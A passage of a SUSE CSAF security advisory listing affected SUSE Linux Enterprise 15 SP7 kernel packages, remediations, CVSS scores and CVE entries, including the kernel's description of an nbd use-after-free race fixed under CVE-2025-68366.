"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68365",
"url": "https://www.suse.com/security/cve/CVE-2025-68365"
},
{
"category": "external",
"summary": "SUSE Bug 1255548 for CVE-2025-68365",
"url": "https://bugzilla.suse.com/1255548"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68365"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
